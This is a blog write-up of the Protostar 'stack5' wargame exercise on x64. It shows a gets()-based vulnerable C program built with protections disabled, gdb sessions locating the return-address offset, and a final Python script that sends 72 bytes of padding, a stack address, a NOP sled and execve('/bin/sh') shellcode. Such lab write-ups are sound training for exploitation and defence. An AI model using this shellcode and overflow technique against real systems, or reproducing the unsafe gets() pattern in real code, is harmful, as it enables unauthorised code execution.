Protostar stack5 – Shellcode with stack overflows

Posted byNhat TruongPosted inPwnableTags:, , , , , , , ,

OS: Parrot OS x64

Stack5.c:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}

Build file:

gcc -fno-stack-protector -z execstack -Wl,-z,norelro -o stack5 stack5.c 

Checksec:

Analasis:

  • This is a simple task, x64
  • No protection (you can add more if you like :v)
  • Execute /bin/sh

Review main code:

Check padding:

=> “A”*72

Check sp:

import struct 
offset = "A"*72

sp =  "BBBBBBBB"

shellcode="\xcc"*4

└──╼ $gdb -q stack5
Reading symbols from stack5...
(No debugging symbols found in stack5)
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
   0x000000000040113d <+0>:	push   rbp
   0x000000000040113e <+1>:	mov    rbp,rsp
   0x0000000000401141 <+4>:	sub    rsp,0x50
   0x0000000000401145 <+8>:	mov    DWORD PTR [rbp-0x44],edi
   0x0000000000401148 <+11>:	mov    QWORD PTR [rbp-0x50],rsi
   0x000000000040114c <+15>:	lea    rax,[rbp-0x40]
   0x0000000000401150 <+19>:	mov    rdi,rax
   0x0000000000401153 <+22>:	call   0x401030 <gets@plt>
   0x0000000000401158 <+27>:	leave  
   0x0000000000401159 <+28>:	ret    
End of assembler dump.
(gdb) break *0x0000000000401158
Breakpoint 1 at 0x401158
(gdb) run < exploit
Starting program: /home/user/Desktop/stack5 < exploit

Breakpoint 1, 0x0000000000401158 in main ()
(gdb) x/32x $rsp
0x7fffffffe3c0:	0xffffe508	0x00007fff	0x000000c2	0x00000001
0x7fffffffe3d0:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffe3e0:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffe3f0:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffe400:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffe410:	0x41414141	0x41414141	0x42424242	0x42424242
0x7fffffffe420:	0xcccccccc	0x00007f00	0x00000000	0x00000001
0x7fffffffe430:	0x0040113d	0x00000000	0xf7e067d9	0x00007fff
(gdb) si
0x0000000000401159 in main ()
(gdb) x/32x $rsp
0x7fffffffe418:	0x42424242	0x42424242	0xcccccccc	0x00007f00
0x7fffffffe428:	0x00000000	0x00000001	0x0040113d	0x00000000
0x7fffffffe438:	0xf7e067d9	0x00007fff	0x00000000	0x00000000
0x7fffffffe448:	0x38c54747	0x179b2b52	0x00401040	0x00000000
0x7fffffffe458:	0x00000000	0x00000000	0x00000000	0x00000000
0x7fffffffe468:	0x00000000	0x00000000	0xd2454747	0xe864d42d
0x7fffffffe478:	0xc3034747	0xe864c412	0x00000000	0x00000000
0x7fffffffe488:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) si

Program received signal SIGSEGV, Segmentation fault.
0x0000000000401159 in main ()
(gdb) x/32x $rsp
0x7fffffffe418:	0x42424242	0x42424242	0xcccccccc	0x00007f00
0x7fffffffe428:	0x00000000	0x00000001	0x0040113d	0x00000000
0x7fffffffe438:	0xf7e067d9	0x00007fff	0x00000000	0x00000000
0x7fffffffe448:	0x38c54747	0x179b2b52	0x00401040	0x00000000
0x7fffffffe458:	0x00000000	0x00000000	0x00000000	0x00000000
0x7fffffffe468:	0x00000000	0x00000000	0xd2454747	0xe864d42d
0x7fffffffe478:	0xc3034747	0xe864c412	0x00000000	0x00000000
0x7fffffffe488:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb)

sp => 0x00007fffffffe4c0

Get shellcode here: http://shell-storm.org/shellcode/files/shellcode-806.php

Final code:

import struct 
offset = "A"*72

sp =  "\xc0\xe4\xff\xff\xff\x7f\x00\x00"

nops = "\x90"*320
breakp="\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
print offset + sp + nops + breakp

Final

Published by Nhat Truong

Hi

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s

%d bloggers like this: